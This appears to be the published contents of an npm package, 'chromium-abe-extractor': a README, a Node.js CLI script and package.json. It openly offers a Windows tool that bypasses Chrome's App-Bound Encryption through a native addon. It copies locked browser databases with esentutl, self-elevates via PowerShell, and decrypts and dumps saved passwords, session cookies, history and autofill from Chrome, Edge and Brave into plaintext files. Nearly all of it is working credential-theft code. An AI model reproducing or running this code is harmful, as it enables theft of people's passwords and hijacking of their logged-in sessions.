chromium-abe-extractor 1.0.0

package/README.md

@@ -0,0 +1,55 @@
+# chromium-abe-extractor
+
+Extract Cookies, Passwords, History, and Autofill from Chrome, Edge, and Brave using App-Bound Encryption (ABE) key bypass on Windows.
+
+> ⚠️ Windows uniquement. Nécessite un binaire natif `chrome_elevator.node` compilé pour la plateforme cible et très probablement les droits Administrateur.
+
+## Installation
+
+Depuis un projet Node (en local) :
+
+```bash
+npm install chromium-abe-extractor
+```
+
+Ou en global pour l'utiliser en ligne de commande :
+
+```bash
+npm install -g chromium-abe-extractor
+```
+
+## Utilisation en CLI
+
+Une fois installé globalement :
+
+```bash
+extractor -v
+```
+
+Options :
+
+- `-v`, `--verbose` : active les logs détaillés.
+- `-h`, `--help` : affiche l'aide.
+
+Les données extraites sont écrites dans le dossier `extracted_data/<browser>/<profile>/`.
+
+## Utilisation comme module Node
+
+```js
+const { main } = require('chromium-abe-extractor');
+
+// Lance l'extraction comme en CLI
+main();
+```
+
+## Publication sur npm
+
+Depuis le dossier du projet :
+
+```bash
+npm login           # une seule fois
+npm publish --access public
+```
+
+Assure-toi que `chrome_elevator.node` est présent dans le paquet (par exemple dans `./build/Release/chrome_elevator.node`) et que les chemins dans `extractor_cli.js` pointent au bon endroit avant de publier.
+

package/extractor_cli.js

@@ -0,0 +1,506 @@
+#!/usr/bin/env node
+const fs = require('fs');
+const path = require('path');
+const crypto = require('crypto');
+const { execSync, spawnSync } = require('child_process');
+
+// --- Configuration & CLI Args ---
+const args = process.argv.slice(2);
+const VERBOSE = args.includes('--verbose') || args.includes('-v');
+const HELP = args.includes('--help') || args.includes('-h');
+
+if (HELP) {
+    console.log(`
+Usage: extractor.exe [options]
+
+Options:
+  -v, --verbose    Enable detailed debug logging
+  -h, --help       Show this help message
+
+Description:
+  Extracts Cookies, Passwords, History, and Autofill from Chrome, Edge, and Brave
+  using App-Bound Encryption (ABE) key bypass.
+    `);
+    process.exit(0);
+}
+
+function debug(msg) {
+    if (VERBOSE) console.log(`[DEBUG] ${msg}`);
+}
+
+function log(msg) {
+    console.log(msg);
+}
+
+function error(msg) {
+    console.error(`[ERROR] ${msg}`);
+}
+
+// --- Load Native Addon ---
+let chromeElevator;
+try {
+    // Try multiple paths to find the native addon
+    const possiblePaths = [
+        './build/Release/chrome_elevator.node',
+        './chrome_elevator.node',
+        path.join(process.resourcesPath || '', 'chrome_elevator.node'), // Electron/Builder path
+        path.join(path.dirname(process.execPath), 'chrome_elevator.node')
+    ];
+
+    for (const p of possiblePaths) {
+        if (fs.existsSync(p)) {
+            debug(`Found native addon at: ${p}`);
+            chromeElevator = require(p);
+            break;
+        }
+    }
+
+    if (!chromeElevator) {
+        // Fallback to standard require if specific paths fail (e.g. dev environment)
+        try {
+            chromeElevator = require('./build/Release/chrome_elevator.node');
+        } catch (e) {
+            throw new Error("Could not find chrome_elevator.node in standard locations.");
+        }
+    }
+} catch (err) {
+    error("Failed to load native addon: " + err.message);
+    process.exit(1);
+}
+
+// --- Database Library ---
+let Database;
+try {
+    Database = require('better-sqlite3');
+} catch (err) {
+    error("Failed to load better-sqlite3: " + err.message);
+    process.exit(1);
+}
+
+// --- Browser Definitions ---
+const BROWSERS = {
+    'chrome': {
+        path: path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome', 'User Data'),
+        name: 'Google Chrome'
+    },
+    'chrome-beta': {
+        path: path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome Beta', 'User Data'),
+        name: 'Google Chrome Beta'
+    },
+    'edge': {
+        path: path.join(process.env.LOCALAPPDATA, 'Microsoft', 'Edge', 'User Data'),
+        name: 'Microsoft Edge'
+    },
+    'brave': {
+        path: path.join(process.env.LOCALAPPDATA, 'BraveSoftware', 'Brave-Browser', 'User Data'),
+        name: 'Brave Browser'
+    }
+};
+
+// --- Helper Functions ---
+
+/**
+ * Reads profile list and display names from browser Local State (same source as the browser).
+ * Returns { folders: string[], displayNames: Object.<string, string> }.
+ * Falls back to empty if file missing or invalid.
+ */
+function readLocalStateProfiles(userDataPath) {
+    const localStatePath = path.join(userDataPath, 'Local State');
+    const result = { folders: [], displayNames: {} };
+
+    if (!fs.existsSync(localStatePath)) return result;
+
+    try {
+        const raw = fs.readFileSync(localStatePath, 'utf8');
+        const data = JSON.parse(raw);
+        const infoCache = data?.profile?.info_cache;
+
+        if (!infoCache || typeof infoCache !== 'object') return result;
+
+        for (const [folderName, info] of Object.entries(infoCache)) {
+            result.folders.push(folderName);
+            if (info && typeof info.name === 'string') {
+                result.displayNames[folderName] = info.name;
+            }
+        }
+    } catch (err) {
+        debug(`Local State read failed: ${err.message}`);
+    }
+
+    return result;
+}
+
+/**
+ * Returns list of profile folder names to process. Uses Local State first so all
+ * profiles (e.g. "Ad Blocking") are included; only keeps folders that exist on disk.
+ */
+function getProfileFolders(userDataPath) {
+    const { folders, displayNames } = readLocalStateProfiles(userDataPath);
+
+    const existing = folders.filter((name) => {
+        const fullPath = path.join(userDataPath, name);
+        try {
+            return fs.statSync(fullPath).isDirectory();
+        } catch {
+            return false;
+        }
+    });
+
+    if (existing.length > 0) return { folders: existing, displayNames };
+
+    // Fallback: scan filesystem (Default, Profile 1, Profile 2, ...)
+    try {
+        const entries = fs.readdirSync(userDataPath, { withFileTypes: true });
+        for (const entry of entries) {
+            if (entry.isDirectory() && (entry.name === 'Default' || entry.name.startsWith('Profile'))) {
+                existing.push(entry.name);
+            }
+        }
+    } catch (err) {
+        debug(`Profile folder scan failed: ${err.message}`);
+    }
+
+    return { folders: existing, displayNames };
+}
+
+function isAdmin() {
+    try {
+        execSync('net session', { stdio: 'ignore' });
+        return true;
+    } catch {
+        return false;
+    }
+}
+
+function copyFileVSS(source, dest) {
+    debug(`Copying ${source} to ${dest}`);
+    try {
+        // 1. Try native copyLockedFile
+        if (chromeElevator.copyLockedFile) {
+            debug("Attempting native copyLockedFile...");
+            if (chromeElevator.copyLockedFile(source, dest)) {
+                debug("Native copy successful.");
+                return;
+            }
+            debug("Native copy returned false.");
+        }
+        
+        // 2. Try standard fs.copy
+        debug("Attempting standard fs.copy...");
+        fs.copyFileSync(source, dest);
+        debug("Standard copy successful.");
+        
+    } catch (err) {
+        debug(`Standard copy failed: ${err.message}`);
+        // 3. Fallback to esentutl
+        try {
+            debug("Attempting esentutl fallback...");
+            const cmd = `esentutl /y "${source}" /d "${dest}" /vss`;
+            execSync(cmd, { stdio: 'ignore' });
+            debug("Esentutl copy successful.");
+        } catch (e) {
+            throw new Error("All copy methods failed. Esentutl error: " + e.message);
+        }
+    }
+}
+
+function decryptData(encryptedBuffer, keyHex) {
+    try {
+        if (!encryptedBuffer || encryptedBuffer.length < 31) return null;
+
+        const prefix = encryptedBuffer.slice(0, 3).toString();
+        if (prefix !== 'v20') return null;
+
+        const iv = encryptedBuffer.slice(3, 15);
+        const ciphertext = encryptedBuffer.slice(15, -16);
+        const tag = encryptedBuffer.slice(-16);
+        const key = Buffer.from(keyHex, 'hex');
+
+        const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);
+        decipher.setAuthTag(tag);
+
+        let decrypted = decipher.update(ciphertext);
+        decrypted = Buffer.concat([decrypted, decipher.final()]);
+
+        if (decrypted.length > 32) {
+            return decrypted.slice(32).toString('utf8');
+        }
+        return decrypted.toString('utf8');
+
+    } catch (err) {
+        debug(`Decryption failed: ${err.message}`);
+        return null;
+    }
+}
+
+function toNetscape(cookie) {
+    const domain = cookie.host_key;
+    const flag = domain.startsWith('.') ? 'TRUE' : 'FALSE';
+    const path = cookie.path;
+    const secure = cookie.is_secure ? 'TRUE' : 'FALSE';
+    
+    let expiration = 0;
+    if (cookie.expires_utc > 0) {
+        expiration = Math.floor((cookie.expires_utc / 1000000) - 11644473600);
+        if (expiration < 0) expiration = 0;
+    }
+    
+    const name = cookie.name;
+    const value = cookie.decryptedValue;
+    
+    return `${domain}\t${flag}\t${path}\t${secure}\t${expiration}\t${name}\t${value}`;
+}
+
+// --- Extraction Functions ---
+
+function extractHistory(profilePath, outputDir) {
+    const historyPath = path.join(profilePath, 'History');
+    if (!fs.existsSync(historyPath)) {
+        debug(`No History file found at ${historyPath}`);
+        return;
+    }
+
+    const tempDb = path.join(outputDir, 'temp_history.db');
+    try {
+        copyFileVSS(historyPath, tempDb);
+        const db = new Database(tempDb, { readonly: true });
+        
+        const stmt = db.prepare('SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 5000');
+        const rows = stmt.all();
+        
+        const outFile = path.join(outputDir, 'history.txt');
+        const stream = fs.createWriteStream(outFile, { flags: 'w' });
+        
+        for (const row of rows) {
+            stream.write(`URL: ${row.url}\nTitle: ${row.title}\nVisits: ${row.visit_count}\nLast Visit: ${row.last_visit_time}\n--------------------------\n`);
+        }
+        
+        stream.end();
+        db.close();
+        log(`      [V] Extracted ${rows.length} history items.`);
+    } catch (err) {
+        error(`Error extracting history: ${err.message}`);
+    } finally {
+        if (fs.existsSync(tempDb)) try { fs.unlinkSync(tempDb); } catch(e) {}
+    }
+}
+
+function extractAutofill(profilePath, outputDir) {
+    const webDataPath = path.join(profilePath, 'Web Data');
+    if (!fs.existsSync(webDataPath)) {
+        debug(`No Web Data file found at ${webDataPath}`);
+        return;
+    }
+
+    const tempDb = path.join(outputDir, 'temp_webdata.db');
+    try {
+        copyFileVSS(webDataPath, tempDb);
+        const db = new Database(tempDb, { readonly: true });
+        
+        const stmt = db.prepare('SELECT name, value, date_created FROM autofill');
+        const rows = stmt.all();
+        
+        const outFile = path.join(outputDir, 'autofill.txt');
+        const stream = fs.createWriteStream(outFile, { flags: 'w' });
+        
+        for (const row of rows) {
+            stream.write(`Name: ${row.name}\nValue: ${row.value}\nDate: ${row.date_created}\n--------------------------\n`);
+        }
+        
+        stream.end();
+        db.close();
+        log(`      [V] Extracted ${rows.length} autofill items.`);
+    } catch (err) {
+        error(`Error extracting autofill: ${err.message}`);
+    } finally {
+        if (fs.existsSync(tempDb)) try { fs.unlinkSync(tempDb); } catch(e) {}
+    }
+}
+
+function extractPasswords(profilePath, outputDir, key) {
+    const loginDataPath = path.join(profilePath, 'Login Data');
+    if (!fs.existsSync(loginDataPath)) {
+        debug(`No Login Data file found at ${loginDataPath}`);
+        return;
+    }
+
+    const tempDb = path.join(outputDir, 'temp_login.db');
+    try {
+        copyFileVSS(loginDataPath, tempDb);
+        const db = new Database(tempDb, { readonly: true });
+        
+        const stmt = db.prepare('SELECT origin_url, username_value, password_value FROM logins');
+        const rows = stmt.all();
+        
+        const outFile = path.join(outputDir, 'passwords.txt');
+        const stream = fs.createWriteStream(outFile, { flags: 'w' });
+        let count = 0;
+
+        for (const row of rows) {
+            if (row.password_value) {
+                const decryptedPass = decryptData(row.password_value, key);
+                if (decryptedPass) {
+                    stream.write(`URL: ${row.origin_url}\nUser: ${row.username_value}\nPass: ${decryptedPass}\n--------------------------\n`);
+                    count++;
+                }
+            }
+        }
+        
+        stream.end();
+        db.close();
+        log(`      [V] Extracted ${count} passwords.`);
+    } catch (err) {
+        error(`Error extracting passwords: ${err.message}`);
+    } finally {
+        if (fs.existsSync(tempDb)) try { fs.unlinkSync(tempDb); } catch(e) {}
+    }
+}
+
+// --- Main Execution ---
+
+function main() {
+    log("=== Universal Browser Data Extractor CLI (ABE) ===");
+    log("Version 1.0.0");
+    debug("Debug mode enabled.");
+
+    if (!isAdmin()) {
+        log("[-] Not running as Administrator. Attempting to elevate...");
+        try {
+            const scriptPath = __filename;
+            const nodePath = process.execPath;
+            
+            // Check if we are in an executable (pkg or electron built)
+            const isPackaged = process.pkg || process.argv[0].endsWith('.exe');
+            
+            let cmd;
+            if (isPackaged && !process.argv[0].includes('node.exe')) {
+                // If running as a standalone EXE (not node.exe), restart the EXE itself
+                 cmd = `powershell -Command "Start-Process '${process.argv[0]}' -ArgumentList '${args.join(' ')}' -Verb RunAs"`;
+            } else {
+                // If running as node script
+                cmd = `powershell -Command "Start-Process '${nodePath}' -ArgumentList '${scriptPath} ${args.join(' ')}' -Verb RunAs"`;
+            }
+
+            debug(`Elevation command: ${cmd}`);
+            execSync(cmd);
+            log("[+] Elevated process started. Please check the new window.");
+            process.exit(0);
+        } catch (err) {
+            error("Failed to elevate privileges: " + err.message);
+            log("[!] Continuing without Admin rights (some files may be locked)...");
+        }
+    } else {
+        log("[+] Running as Administrator.");
+    }
+
+    for (const [key, config] of Object.entries(BROWSERS)) {
+        if (!fs.existsSync(config.path)) {
+            debug(`${config.name} not found at ${config.path}`);
+            continue;
+        }
+
+        log(`\n[*] Processing ${config.name}...`);
+
+        // 1. Get ABE Key
+        let abeKey;
+        try {
+            log(`    > Requesting ABE Key...`);
+            abeKey = chromeElevator.getABEKey(key);
+            if (!abeKey) {
+                log(`    [!] Failed to retrieve ABE Key.`);
+                continue;
+            }
+            log(`    [V] Key retrieved successfully.`);
+            debug(`Key length: ${abeKey.length / 2} bytes`);
+        } catch (err) {
+            error(`Error retrieving key: ${err.message}`);
+            continue;
+        }
+
+        // 2. Find Profiles (from Local State so all profiles e.g. "Ad Blocking" are included)
+        const { folders: profiles, displayNames } = getProfileFolders(config.path);
+
+        if (profiles.length === 0) {
+            log(`    [!] No profiles found.`);
+            continue;
+        }
+
+        log(`    > Found ${profiles.length} profiles.`);
+
+        // 3. Process each profile
+        for (const profile of profiles) {
+            const profilePath = path.join(config.path, profile);
+            const cookiePath = path.join(profilePath, 'Network', 'Cookies');
+            const displayName = displayNames[profile];
+            const profileLabel = displayName ? `${profile} (${displayName})` : profile;
+
+            log(`    > Profile: ${profileLabel}`);
+            
+            // Create output directory
+            const outputDir = path.join('extracted_data', key, profile);
+            if (!fs.existsSync(outputDir)) {
+                fs.mkdirSync(outputDir, { recursive: true });
+            }
+
+            // Extract Cookies
+            if (fs.existsSync(cookiePath)) {
+                const tempDbPath = path.join(outputDir, 'temp_cookies.db');
+                try {
+                    copyFileVSS(cookiePath, tempDbPath);
+                    const db = new Database(tempDbPath, { readonly: true });
+                    const stmt = db.prepare('SELECT host_key, name, path, is_secure, expires_utc, encrypted_value FROM cookies');
+                    const cookies = stmt.all();
+                    
+                    let decryptedCount = 0;
+                    const outputFile = path.join(outputDir, 'cookies.txt');
+                    const stream = fs.createWriteStream(outputFile, { flags: 'w' });
+
+                    stream.write("# Netscape HTTP Cookie File\n");
+                    stream.write("# This file was generated by Chrome ABE Decryptor\n\n");
+
+                    for (const cookie of cookies) {
+                        if (cookie.encrypted_value) {
+                            const decryptedValue = decryptData(cookie.encrypted_value, abeKey);
+                            if (decryptedValue) {
+                                cookie.decryptedValue = decryptedValue;
+                                const netscapeLine = toNetscape(cookie);
+                                stream.write(netscapeLine + "\n");
+                                decryptedCount++;
+                            }
+                        }
+                    }
+
+                    stream.end();
+                    db.close();
+                    log(`      [V] Extracted ${decryptedCount} cookies.`);
+                } catch (err) {
+                    error(`Error processing cookies: ${err.message}`);
+                } finally {
+                    if (fs.existsSync(tempDbPath)) try { fs.unlinkSync(tempDbPath); } catch(e) {}
+                }
+            } else {
+                debug(`No Cookies file found at ${cookiePath}`);
+            }
+
+            // Extract History
+            extractHistory(profilePath, outputDir);
+
+            // Extract Autofill
+            extractAutofill(profilePath, outputDir);
+
+            // Extract Passwords
+            extractPasswords(profilePath, outputDir, abeKey);
+        }
+    }
+    log("\n=== Extraction Complete ===");
+    if (process.stdin.isTTY) {
+        log("Press Enter to exit...");
+        process.stdin.once('data', () => process.exit(0));
+    }
+}
+
+if (require.main === module) {
+    main();
+}
+
+module.exports = { main };

package/package.json

@@ -0,0 +1,38 @@
+{
+  "name": "chromium-abe-extractor",
+  "version": "1.0.0",
+  "description": "Extract Cookies, Passwords, History, and Autofill from Chrome, Edge, and Brave using App-Bound Encryption (ABE) key bypass (Windows only).",
+  "main": "extractor_cli.js",
+  "bin": {
+    "extractor": "extractor_cli.js"
+  },
+  "scripts": {
+    "start": "node extractor_cli.js"
+  },
+  "keywords": [
+    "chrome",
+    "edge",
+    "brave",
+    "chromium",
+    "cookies",
+    "passwords",
+    "history",
+    "autofill",
+    "abe",
+    "decrypt"
+  ],
+  "author": "",
+  "license": "MIT",
+  "dependencies": {
+    "better-sqlite3": "^11.0.0"
+  },
+  "files": [
+    "extractor_cli.js",
+    "chrome_elevator.node",
+    "README.md"
+  ],
+  "os": [
+    "win32"
+  ]
+}
+